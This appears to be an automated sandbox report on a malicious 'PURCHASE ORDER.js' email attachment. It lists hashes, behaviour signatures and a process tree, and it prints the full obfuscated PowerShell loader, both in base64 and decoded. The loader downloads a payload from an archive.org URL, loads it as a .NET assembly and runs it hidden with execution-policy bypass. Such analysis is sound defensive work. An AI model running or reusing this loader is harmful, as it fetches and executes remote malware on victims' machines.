Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
20-09-2024 18:16
Static task
static1
Behavioral task
behavioral1
Sample
PURCHASE ORDER.js
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
PURCHASE ORDER.js
Resource
win10v2004-20240802-en
General
-
Target
PURCHASE ORDER.js
-
Size
319KB
-
MD5
e8114157714655fdbc7b51cde4f676de
-
SHA1
c23a2b3c76b2b7927f64cf74c3cf75b408a629e4
-
SHA256
d20d1cb56afa7818be3b26074bed7eae73e5480a5a8e0add5384bc9eddbc333d
-
SHA512
9f33a77504f56f4b0bce859d3b61f81cf3496a00d6cfd3aaef708f700149c72f1fb009f15e720a59b013a443c15b3c68a621358c624138b72f3409db53692c8b
-
SSDEEP
6144:1m06WlUzat6poIKNrZUG8IyWwmRn+CvA1HPucBzprZa8qYlVLY8/1PcKpOu4:w06WF6poIKN9UGDykRn+gA1HPu4zpNar
Malware Config
Extracted
https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt
https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 2796 powershell.exe 4 2796 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2796 powershell.exe 2644 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2644 powershell.exe 2796 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2644 powershell.exe Token: SeDebugPrivilege 2796 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2716 wrote to memory of 2644 2716 wscript.exe 31 PID 2716 wrote to memory of 2644 2716 wscript.exe 31 PID 2716 wrote to memory of 2644 2716 wscript.exe 31 PID 2644 wrote to memory of 2796 2644 powershell.exe 33 PID 2644 wrote to memory of 2796 2644 powershell.exe 33 PID 2644 wrote to memory of 2796 2644 powershell.exe 33
Processes
-
C:\Windows\system32\wscript.exewscript.exe "C:\Users\Admin\AppData\Local\Temp\PURCHASE ORDER.js"1⤵
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAnAGIATQBCAHUAcgBsACcAKwAnACAAPQAgAE4AVwAnACsAJwBxAGgAdAB0AHAAcwA6ACcAKwAnAC8AJwArACcALwAnACsAJwBpAGEAJwArACcAOQAnACsAJwAwADQAJwArACcANgAwACcAKwAnADEALgB1AHMALgBhAHIAJwArACcAYwBoAGkAdgBlAC4AbwByAGcAJwArACcALwA2AC8AJwArACcAaQB0ACcAKwAnAGUAbQBzAC8AZABlAHQAYQBoACcAKwAnAC0AbgBvAHQAZQAtAGoALwBEAGUAdABhAGgAJwArACcATgBvAHQAZQBKAC4AdAB4AHQATgBXAHEAOwBiAE0AQgBiACcAKwAnAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACAAJwArACcAPQAnACsAJwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AJwArACcATgAnACsAJwBlAHQALgAnACsAJwBXAGUAYgBDAGwAaQBlAG4AdAApAC4AJwArACcARABvAHcAbgAnACsAJwBsAG8AYQBkACcAKwAnAFMAJwArACcAdAByAGkAbgBnACgAYgBNAEIAdQByAGwAJwArACcAKQA7AGIATQAnACsAJwBCAGIAJwArACcAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuAHQAIAA9ACAAJwArACcAWwAnACsAJwBTAHkAcwB0AGUAbQAuACcAKwAnAEMAJwArACcAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwAnACsAJwBlACcAKwAnADYANABTACcAKwAnAHQAcgBpAG4AZwAoAGIATQBCAGIAJwArACcAYQBzACcAKwAnAGUANgA0AEMAJwArACcAbwBuAHQAZQBuAHQAKQAnACsAJwA7AGIATQAnACsAJwBCAGEAJwArACcAcwBzAGUAbQBiACcAKwAnAGwAeQAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQAnACsAJwBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAGIATQBCAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuAHQAKQA7AGIATQAnACsAJwBCAHQAeQBwAGUAIAA9ACAAYgBNAEIAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5ACcAKwAnAHAAJwArACcAZQAoAE4AJwArACcAVwBxAFIAdQAnACsAJwBuAFAARQAuAEgAbwAnACsAJwBtAGUATgBXAHEAKQA7AGIATQBCAG0AZQB0AGgAbwBkACAAPQAgAGIATQBCAHQAeQBwAGUALgAnACsAJwBHAGUAdAAnACsAJwBNACcAKwAnAGUAdABoAG8AZAAoAE4AVwBxAFYAQQBJAE4AVwBxACkAOwBiACcAKwAnAE0AQgAnACsAJwBtAGUAdABoAG8AZAAuAEkAbgB2AG8AawBlACgAYgBNAEIAbgB1ACcAKwAnAGwAbAAsACAAWwBvAGIAagAnACsAJwBlACcAKwAnAGMAdABbAF0AXQBAACgATgBXAHEAdAB4AHQAJwArACcALgBhAGYAYQAvAHYAZQBkAC4AJwArACcAMgByAC4AMwA5AGIAMwA0ADUAMwAwADIAYQAwADcANQBiADEAYgAnACsAJwBjADAAJwArACcAZAA0ADUAYgA2ADMAMgBlAGIAOQBlAGUANgAnACsAJwAyAC0AYgB1AHAALwAvADoAcwBwACcAKwAnAHQAdABoAE4AVwBxACcAKwAnACAALAAgAE4AVwBxAGQAZQBzAGEAJwArACcAdABpAHYAJwArACcAYQBkAG8ATgBXAHEAIAAnACsAJwAsACAAJwArACcATgAnACsAJwBXAHEAZABlAHMAYQB0AGkAdgBhAGQAbwBOAFcAcQAgACcAKwAnACwAIABOAFcAcQAnACsAJwBkAGUAcwBhAHQAaQB2AGEAJwArACcAZABvAE4AVwBxACwAJwArACcATgBXAHEAQQAnACsAJwBkAGQAJwArACcASQBuACcAKwAnAFAAcgBvAGMAZQAnACsAJwBzAHMAMwAyAE4AVwBxACwATgAnACsAJwBXAHEAZABlACcAKwAnAHMAYQAnACsAJwB0ACcAKwAnAGkAdgBhACcAKwAnAGQAJwArACcAbwBOAFcAJwArACcAcQApACkAJwArACcAOwAnACkALgBSAEUAUABMAGEAQwBFACgAKABbAGMASABhAFIAXQA5ADgAKwBbAGMASABhAFIAXQA3ADcAKwBbAGMASABhAFIAXQA2ADYAKQAsACcAJAAnACkALgBSAEUAUABMAGEAQwBFACgAKABbAGMASABhAFIAXQA3ADgAKwBbAGMASABhAFIAXQA4ADcAKwBbAGMASABhAFIAXQAxADEAMwApACwAWwBzAHQAUgBJAG4ARwBdAFsAYwBIAGEAUgBdADMAOQApAHwAIAAuACgAIAAkAHAAUwBIAG8AbQBlAFsAMgAxAF0AKwAkAHAAcwBoAE8AbQBlAFsAMwA0AF0AKwAnAFgAJwApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('bMBurl'+' = NW'+'qhttps:'+'/'+'/'+'ia'+'9'+'04'+'60'+'1.us.ar'+'chive.org'+'/6/'+'it'+'ems/detah'+'-note-j/Detah'+'NoteJ.txtNWq;bMBb'+'ase64Content '+'='+' (New-Object System.'+'N'+'et.'+'WebClient).'+'Down'+'load'+'S'+'tring(bMBurl'+');bM'+'Bb'+'in'+'aryContent = '+'['+'System.'+'C'+'onvert]::FromBas'+'e'+'64S'+'tring(bMBb'+'as'+'e64C'+'ontent)'+';bM'+'Ba'+'ssemb'+'ly = [Reflecti'+'on.Assembly]::Load(bMBbin'+'aryContent);bM'+'Btype = bMBassembly.GetTy'+'p'+'e(N'+'WqRu'+'nPE.Ho'+'meNWq);bMBmethod = bMBtype.'+'Get'+'M'+'ethod(NWqVAINWq);b'+'MB'+'method.Invoke(bMBnu'+'ll, [obj'+'e'+'ct[]]@(NWqtxt'+'.afa/ved.'+'2r.39b345302a075b1b'+'c0'+'d45b632eb9ee6'+'2-bup//:sp'+'tthNWq'+' , NWqdesa'+'tiv'+'adoNWq '+', '+'N'+'WqdesativadoNWq '+', NWq'+'desativa'+'doNWq,'+'NWqA'+'dd'+'In'+'Proce'+'ss32NWq,N'+'Wqde'+'sa'+'t'+'iva'+'d'+'oNW'+'q))'+';').REPLaCE(([cHaR]98+[cHaR]77+[cHaR]66),'$').REPLaCE(([cHaR]78+[cHaR]87+[cHaR]113),[stRInG][cHaR]39)| .( $pSHome[21]+$pshOme[34]+'X')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2796
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5253d6b2e02153c50db7a235cf1a146ab
SHA1f054095d16d2b350a1a19e603eab5eac4a5b4c42
SHA2569a512b8873c22c1af6e19dce58488e82fbca1266a827300b51f2e96d7ed955b0
SHA51285d9a777936e9df315014a61316bef6bee62c146b24f768563cb00ba37821aec602710af82e136db0343f9226f82d924c51b892f5924ad3b237b0d1afcd253dc